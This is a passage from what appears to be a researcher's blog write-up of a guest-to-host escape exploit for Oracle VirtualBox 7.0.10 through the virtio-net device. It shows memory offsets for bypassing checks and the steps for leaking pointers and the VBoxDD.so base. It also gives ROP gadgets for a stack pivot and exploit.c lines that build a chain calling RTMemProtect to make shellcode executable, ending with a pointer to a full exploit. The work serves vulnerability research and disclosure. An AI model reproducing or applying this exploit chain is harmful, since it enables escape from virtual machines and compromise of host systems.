/*  384      |     8 */    char achInstanceData[8];
 
                             /* total size (bytes):  392 */
                         }

But there is a trick we can use: we can modify the pDevInsR3 pointer in the PDMPCIDEVINT structure to point to pDevInsR3 + 0x10. This way, pvInstanceDataR3 will contain the pointer that was originally in pCritSectRoR3. We do this because we know that the critical section is located at pThis + 7536 + 16 (as we observed earlier). By pointing it there, we will be able to modify the contents:

However, there are a series of checks we need to bypass:

src/VBox/Devices/VirtIO/VirtioCore.cpp

if (uAddress == pVirtio->uPciCfgDataOff)

src/VBox/Devices/VirtIO/VirtioCore.cpp

 
[Truncated]
 
struct virtio_pci_cap *pPciCap = &pVirtioCC->pPciCfgCap->pciCap;
uint32_t uLength = pPciCap->uLength;
 
[Truncated]
 
if (  (uLength != 1 && uLength != 2 && uLength != 4)
    || pPciCap->uBar != VIRTIO_REGION_PCI_CAP)
{
    ASSERT_GUEST_MSG_FAILED(("Guest read virtio_pci_cfg_cap.pci_cfg_data using mismatching config. "
                                "Ignoring\n"));
    *pu32Value = UINT32_MAX;
    return VINF_SUCCESS;
}
 
[Truncated]

Therefore, it is necessary to modify these “fields” in order to successfully bypass the checks and trigger the call to:

src/VBox/Devices/VirtIO/VirtioCore.cpp

VBOXSTRICTRC rcStrict = virtioMmioRead(pDevIns, pVirtio, pPciCap->uOffset, pu32Value, cb);

For example, uBar is located at a distance of 7536 + 16 + 0x300 + 4 from pThis:

GDB

gef>  ptype /o pVirtioCC->pPciCfgCap->pciCap
/* offset    |  size */  type = struct virtio_pci_cap {
/*    0      |     1 */    uint8_t uCapVndr;
/*    1      |     1 */    uint8_t uCapNext;
/*    2      |     1 */    uint8_t uCapLen;
/*    3      |     1 */    uint8_t uCfgType;
/*    4      |     1 */    uint8_t uBar;
/*    5      |     3 */    uint8_t uPadding[3];
/*    8      |     4 */    uint32_t uOffset;
/*   12      |     4 */    uint32_t uLength;
 
                             /* total size (bytes):   16 */
                         }

We are interested in the call to the virtioMmioRead function because this is where the data copy will actually be handled.

src/VBox/Devices/VirtIO/VirtioCore.cpp

 
[Truncated]
 
/*
    * Callback to client to manage device-specific configuration.
    */
VBOXSTRICTRC rcStrict = pVirtioCC->pfnDevCapRead(pDevIns, uOffset, pv, cb);
 
/*
    * Anytime any part of the dev-specific dev config (which this virtio core implementation sees
    * as a blob, and virtio dev-specific code separates into fields) is READ, it must be compared
    * for deltas from previous read to maintain a config gen. seq. counter (VirtIO 1.0, section 4.1.4.3.1)
    */
bool fDevSpecificFieldChanged = RT_BOOL(memcmp(pVirtioCC->pbDevSpecificCfg + uOffset,
                                            pVirtioCC->pbPrevDevSpecificCfg + uOffset,
                                            RT_MIN(cb, pVirtioCC->cbDevSpecificCfg - uOffset)));
 
memcpy(pVirtioCC->pbPrevDevSpecificCfg, pVirtioCC->pbDevSpecificCfg, pVirtioCC->cbDevSpecificCfg);
 
if (pVirtio->fGenUpdatePending || fDevSpecificFieldChanged)
{
    ++pVirtio->uConfigGeneration;
    Log6Func(("Bumped cfg. generation to %d because %s%s\n", pVirtio->uConfigGeneration,
                fDevSpecificFieldChanged ? "<dev cfg changed> " : "",
                pVirtio->fGenUpdatePending ? "<update was pending>" : ""));
    pVirtio->fGenUpdatePending = false;
}
 
[Truncated]

However, we have a couple of small issues. If we enter the first if statement, when pVirtioCC->pfnDevCapRead is called, it is not pointing to the correct function (virtioNetR3DevCapRead) because we previously modified the pointer to pDevInsR3.

I considered entering the second if statement, where virtioCommonCfgAccessed is called. To save you part of the analysis process, this turned out to be the correct option:

src/VBox/Devices/VirtIO/VirtioCore.cpp

if (MATCHES_VIRTIO_CAP_STRUCT(off, cb, uOffset, pVirtio->LocCommonCfgCap))
    return virtioCommonCfgAccessed(pDevIns, pVirtio, pVirtioCC, false /* fWrite */, uOffset, cb, pv);

To access that if statement, it is necessary to meet the check:

src/VBox/Devices/VirtIO/VirtioCore.cpp

MATCHES_VIRTIO_CAP_STRUCT(off, cb, uOffset, pVirtio->LocCommonCfgCap)

This is a macro, which is defined as:

src/VBox/Devices/VirtIO/VirtioCore.cpp

#define MATCHES_VIRTIO_CAP_STRUCT(a_offAccess, a_cbAccess, a_offsetIntoCap, a_LocCapData) \
    (   ((a_offsetIntoCap) = (uint32_t)((a_offAccess) - (a_LocCapData).offMmio)) < (uint32_t)(a_LocCapData).cbMmio \
     && (a_offsetIntoCap) + (uint32_t)(a_cbAccess) <= (uint32_t)(a_LocCapData).cbMmio )

GDB

gef>  ptype /o VIRTIO_PCI_CAP_LOCATIONS_T
/* offset    |  size */  type = struct VIRTIO_PCI_CAP_LOCATIONS_T {
/*    0      |     2 */    uint16_t offMmio;
/*    2      |     2 */    uint16_t cbMmio;
/*    4      |     2 */    uint16_t offPci;
/*    6      |     2 */    uint16_t cbPci;
 
                           /* total size (bytes):    8 */
                         }

To do this, we can, for example, write a 0 at 7536 + 16 + 1828 + 0 (offMmio) and 0xff at 7536 + 16 + 1828 + 2 (cbMmio).

From the virtioCommonCfgAccessed function, the part we are most interested in is when the calls to VIRTIO_DEV_CONFIG_ACCESS are made, which is again a macro, defined as follows:

src/VBox/Devices/VirtIO/VirtioCore.h

#define VIRTIO_DEV_CONFIG_ACCESS(member, tCfgStruct, uOffsetOfAccess, pCfgStruct) \
    do \
    { \
        uint32_t uOffsetInMember = uOffsetOfAccess - RT_UOFFSETOF(tCfgStruct, member); \
        if (fWrite) \
            memcpy(((char *)&(pCfgStruct)->member) + uOffsetInMember, pv, cb); \
        else \
            memcpy(pv, ((const char *)&(pCfgStruct)->member) + uOffsetInMember, cb); \
        VIRTIO_DEV_CONFIG_LOG_ACCESS(member, tCfgStruct, uOffsetOfAccess); \
    } while(0)

It copies data to or from the specified member field of the config structure, depending on whether fWrite indicates a write or a read operation.

We are particularly interested in the accesses made to the member fields of pVirtio->aVirtqueues. Additionally, we can control the value of uVirtq (pVirtio->uVirtqSelect).

By doing this, we can successfully leak the address of pDevInsR3, which is “fragmented” across the member fields: uNotifyOffset, uEnable, and uMsixVector.

This also applies to virtioR3PciConfigRead if we read the same fields, but set uVirtq to 4. Additionally, after obtaining the address of virtioR3PciConfigRead, we can calculate the base address of VBoxDD.so:

Now that we have the leaks, we can try to gain control of the execution flow by leveraging the initial idea of corrupting pfnConfigRead.

The call to virtioR3PciConfigRead is made via:

src/VBox/Devices/Bus/DevPCI.cpp

rcStrict = pPciDev->Int.s.pfnConfigRead(pPciDev->Int.s.CTX_SUFF(pDevIns), pPciDev, config_addr, cb, pu32Value);

In fact, if you want to debug the ROP chain, I recommend setting a breakpoint at this location: src/VBox/Devices/Bus/DevPCI.cpp:216.

RAX contains the address of pDevInsR3, with an additional offset of + 0x10 because we modified it earlier:

We have some powerful gadgets at our disposal, such as:

0x00000000004d1a2f: push rax; pop rsp; nop; pop rbp; ret;

This will allow us to pivot the stack:

Additionally, since we can modify the pointer to pDevInsR3, we can make RSP point to a controlled and “safe” area, ensuring that we don’t overwrite important content that could cause crashes.

What are our objectives with the ROP chain? Well, the simplest way to execute our code is through a shellcode, but to do that, we need to give the memory region where it’s stored execution permissions. This is why we could attempt to make a call to mprotect. However, mprotect is located in the libc.so, and we don’t have a leak for libc. An alternative approach would be to use RTMemProtect, but we don’t know its address either, as it is located in VBoxRT.so.

However, we can try to dynamically resolve the address of RTMemProtect. If we take a look at the entries in the GOT, for example, we have the address of RTErrInfoSet, which is located in VBoxRT.so:

0x00007fffb07e4ed8 - 0x00007fffb07e4fe8 is .got in /home/diego/Research/VirtualBox-7.0.10/out/linux.amd64/debug/bin/VBoxDD.so

And we have gadgets like:

Gadgets

0x00000000000656a0: add rax, rdx; pop rbp; ret;

Of course, we also have:

Gadgets

0x00000000000ac71a: pop rdx; ret;
0x00000000001d8489: pop rax; ret;

At this point, we have the address of RTMemProtect in RAX:

Now we can write that address to the memory region where we’re constructing the ROP chain, allowing us to call RTMemProtect later. After that, the only task left is to set up the arguments for the call:

exploit.c

oob_write(dev, vdev, VBoxDD_addr + pop_rdi_ret, PDMPCIDEVINT_s + ROP_off +  (0x8 * 13) - aVlanFilter_off, 64); //pop rdi
oob_write(dev, vdev, pDevInsR3_addr + 0x3000 - 0x200 - 0x200, PDMPCIDEVINT_s + ROP_off + (0x8 * 14) - aVlanFilter_off, 64); //rdi value
oob_write(dev, vdev, VBoxDD_addr + pop_rsi_ret, PDMPCIDEVINT_s + ROP_off +  (0x8 * 15) - aVlanFilter_off, 64); //pop rsi
oob_write(dev, vdev, 0x1000, PDMPCIDEVINT_s + ROP_off                    + (0x8 * 16)  - aVlanFilter_off, 64); //rsi value
oob_write(dev, vdev, VBoxDD_addr + pop_rdx_ret, PDMPCIDEVINT_s + ROP_off +  (0x8 * 17) - aVlanFilter_off, 64); //pop rdx
oob_write(dev, vdev, RTMEM_PROT_READ | RTMEM_PROT_WRITE | RTMEM_PROT_EXEC, PDMPCIDEVINT_s + ROP_off + (0x8 * 18) - aVlanFilter_off, 64); //rdx value

After all this, you can see that the permissions have changed and are now rwx.

The only thing remaining is to trigger the pfnConfigRead callback.

Demo

Full exploit

You can find the full exploit on my GitHub repository.

I hope you enjoyed it!

Oracle VM VirtualBox 7.0.10 r158379 Escape

Table of Contents

Virtio-net

Vulnerability Analysis

Setting up the lab

Writing the exploit

Triggering the bug

Identifying structures in memory

Exploitation Strategy

Demo

Full exploit

Footnotes